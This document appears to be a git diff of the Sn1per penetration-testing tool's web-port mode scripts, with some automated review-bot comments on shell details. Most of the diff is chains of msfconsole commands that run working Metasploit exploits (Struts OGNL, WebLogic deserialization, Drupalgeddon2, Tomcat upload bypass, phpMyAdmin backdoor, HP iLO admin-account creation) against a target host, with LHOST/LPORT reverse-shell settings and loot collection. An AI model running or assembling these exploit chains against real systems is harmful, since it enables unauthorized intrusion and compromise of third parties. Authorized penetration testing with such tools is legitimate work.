"${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST 
"$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw + sed -r 
"s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null + rm -f 
$LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e 
"$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; 
setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null \ No newline at end of file diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index a3729582..ae88dc9f 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh 
@@ -14,8 +14,8 @@ if [ "$MODE" = "webporthttp" ]; then
 mkdir $LOOT_DIR/scans 2> /dev/null
 mkdir $LOOT_DIR/output 2> /dev/null
 fi
- echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt
- sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
+ echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
+ sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
 exit
 fi
 echo -e "$OKRED ____ $RESET"
@@ -26,7 +26,7 @@ if [ "$MODE" = "webporthttp" ]; then
 echo -e "$OKRED /_/ $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
- echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3"
+ echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
 echo -e ""
 echo -e ""
 echo -e " ; , "
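Review bot: On the rewritten `sniper ... | tee ...` line the trailing `2>&1` redirects tee's stderr, not the nested sniper's, so errors from the child scan never reach the per-run output file; move `2>&1` to directly after `$args`, before the `|`, so the child's stderr is captured alongside its stdout. The scans record also changes from a per-port, timestamped file to a single appended `$LOOT_DIR/scans/$TARGET-$MODE.txt`; that is presumably intended to give --status/--list a stable name, but repeated runs on the same port will accumulate duplicate lines, so either de-duplicate when the file is read or add a comment noting that duplicates are expected. The enclosing `if [ "$MODE" = "webporthttp" ]` block starts before the hunk.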
@@ -101,6 +101,12 @@ if [ "$MODE" = "webporthttp" ]; then
 wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
 curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
 curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
+ if [ "$WEBTECH" = "1" ]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
+ fi
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
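Review bot: The new webtech pipeline runs whenever `WEBTECH=1` is set in sniper.conf but never verifies the tool is present, and because it ends in `tee` a missing binary still produces an empty `webtech-$TARGET-http-port$PORT.txt` that is indistinguishable from a clean fingerprint; guard it with `if [ "$WEBTECH" = "1" ] && command -v webtech >/dev/null 2>&1; then`. As a point of style, `grep \-` only reaches grep as a bare `-` after shell dequoting, which reads like a stray option; `grep -e '-'` says explicitly that a literal dash is the pattern. Unlike the neighbouring wget/curl lines, this one also lets webtech's stderr through to the console, which may be intentional for debugging but is worth a comment. The enclosing webporthttp `if` block starts and ends outside the hunk.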
@@ -236,165 +242,8 @@ if [ "$MODE" = "webporthttp" ]; then
 cd $INSTALL_DIR
 fi
 if [ $METASPLOIT_EXPLOIT = "1" ]; then
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
-
-
-
-
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
-
-
-
-
-
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
